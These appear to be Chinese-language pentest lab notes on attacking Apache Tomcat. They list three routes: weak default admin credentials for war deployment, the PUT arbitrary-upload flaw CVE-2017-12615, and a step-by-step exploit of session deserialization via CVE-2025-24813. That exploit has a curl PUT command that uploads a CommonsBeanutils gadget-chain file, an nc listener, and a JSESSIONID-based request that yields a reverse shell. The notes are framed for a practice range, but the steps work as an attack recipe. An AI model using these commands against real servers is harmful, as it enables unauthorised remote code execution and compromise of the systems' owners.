Tomcat
JavaEE 中间件,运行 Java web ,端口 8080
1. 后台弱口令爆破文件部署
tomcat/tomcat8
登录后台,后台部署war包,与weblogic 相同
2. tomcat put 任意文件上传
tomcat/CVE-2017-12615
3. tomcat session 反序列化
CVE-2025-24813 (记得替换修复后的靶场,不要用 vulhub 官方的)
- 生成 cb1 链的 文件
之后去重命名一下,例如改为xiaohecb1.txt
之后把他传到ubuntu中
- 攻击目标服务器
curl -X PUT -H "Content-Range: bytes 0-5000/6200" --data-binary @刚刚生成的cb1链文件的路径 http://目标ip:目标端口/abo/session
⚠️ deserialize 这个字符串可以随便改,改了记得记录下,后面需要对应起来
⚠️ @符号不能删,建议先cd到cb1链文件目录再 @文件名
- 攻击机开启监听
nc -lvnp 端口 - 抓取burp目标服务器任意页面的请求(例如抓首页的包)
删一删cookie,只留下jsessionid
- 发送请求,攻击机得到shell